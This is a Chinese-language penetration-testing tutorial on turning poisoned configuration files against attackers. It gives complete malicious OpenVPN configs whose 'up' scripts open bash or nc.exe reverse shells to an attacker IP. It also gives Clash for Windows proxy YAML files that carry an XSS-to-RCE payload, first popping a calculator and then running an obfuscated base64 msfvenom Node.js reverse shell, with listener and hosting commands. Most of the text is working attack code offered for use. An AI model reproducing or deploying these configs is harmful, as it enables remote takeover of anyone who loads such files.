一、Openvpn反制

openvpn是常见的vpn服务,通过信息泄露、漏洞攻击或钓鱼获取vpn配置文件直接攻入内网,是红队渗透测试常用的技术。

1.1、linux

  • 伪造openvpn配置文件1.open
remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.43.128/9090 0<&1 2>&1&'"

上面所有ip地址都不用变,下面的tcp/后面的ip地址改为kali或者云服务器的,用来反弹shell,执行命令

openvpn --config 1.ovpn
nc -lvvp 9090

image-20240403211608942

1.2、Windows

windows并没有bash,使用powershell反弹shell的命令非常长,由于openvpn限制配置文件不能超越256个字符,故windows尚无利用方法。

当然也有例外,如果需要反制的黑客计算机安装了nc软件,就可以实现windows openvpn反制了(还有其他很多种方法,如诱导下载远控木马并运行)在windows server 2016 上下载nc并复制到C:\windows\system32

image-20240403212433191

  • kali开启监听
nc -lvvp 12333

image-20240403213010322

  • 诱导windows server2016使用下述open文件连接vpn
ifconfig 10.200.0.2 10.200.0.1
dev tun
remote 192.168.1.245
script-security 2
up 'C:\\Windows\\System32\\nc.exe 192.168.43.128 12333 -e cmd.exe'

同样把最后一行换成kali的IP地址

image-20240403212930180

监听页面会反弹到windows的shell

image-20240403213039247

二、clash反制

Clash windows 0.19.08以下

25

2.1、编辑配置文件

注意yaml文件的格式,否则容易出现问题

free_node.yaml

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: ':9090'
proxies:
    - { name: <img src=# onerror="require('child_process').exec('calc');">, type: vmess, server: 123, port: '29999', uuid: B00EC15A-B535-411D-95D6-CAEA028C477F, alterId: 0, cipher: auto, udp: false }
proxy-groups:
    - { name: '🚀 节点选择', type: select, proxies: [<img src=# onerror="require('child_process').exec('calc');">] }

python3 -m http.server 10002

image-20240403214029991

image-20240404094939853

image-20240404095037642

image-20240404094925736

使用配置文件,选择节点,计算器反弹成功。

2.2、反弹shell

  • kali生成nodejs反弹shell的payload

    msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.43.128 LPORT=12333 -f base64

    192.168.43.128是kali的地址

    image-20240404095416885

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: "<details ontoggle=eval(atob('IChmdW5jdGlvbigpeyB2YXIgcmVxdWlyZSA9IGdsb2JhbC5yZXF1aXJlIHx8IGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUuY29uc3RydWN0b3IuX2xvYWQ7IGlmICghcmVxdWlyZSkgcmV0dXJuOyB2YXIgY21kID0gKGdsb2JhbC5wcm9jZXNzLnBsYXRmb3JtLm1hdGNoKC9ed2luL2kpKSA/ICJjbWQiIDogIi9iaW4vc2giOyB2YXIgbmV0ID0gcmVxdWlyZSgibmV0IiksIGNwID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLCB1dGlsID0gcmVxdWlyZSgidXRpbCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjMzMywgIjE5Mi4xNjguNDMuMTI4IiwgZnVuY3Rpb24oKSB7IGNsaWVudC5zb2NrZXQucGlwZShzaC5zdGRpbik7IGlmICh0eXBlb2YgdXRpbC5wdW1wID09PSAidW5kZWZpbmVkIikgeyBzaC5zdGRvdXQucGlwZShjbGllbnQuc29ja2V0KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50LnNvY2tldCk7IH0gZWxzZSB7IHV0aWwucHVtcChzaC5zdGRvdXQsIGNsaWVudC5zb2NrZXQpOyB1dGlsLnB1bXAoc2guc3RkZXJyLCBjbGllbnQuc29ja2V0KTsgfSB9KTsgc29ja2V0Lm9uKCJlcnJvciIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSkoKTs=')); open=></details>"
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
  • 把上面yaml文件写好

image-20240404100827151

  • 开启端口
python3 -m http.server 10002

image-20240404100850253

  • 监听端口
nc -lvnp 12333

image-20240404101131505

  • clash中下载节点文件

image-20240404101321979

image-20240404101343774

反弹shell 成功

image-20240404101402461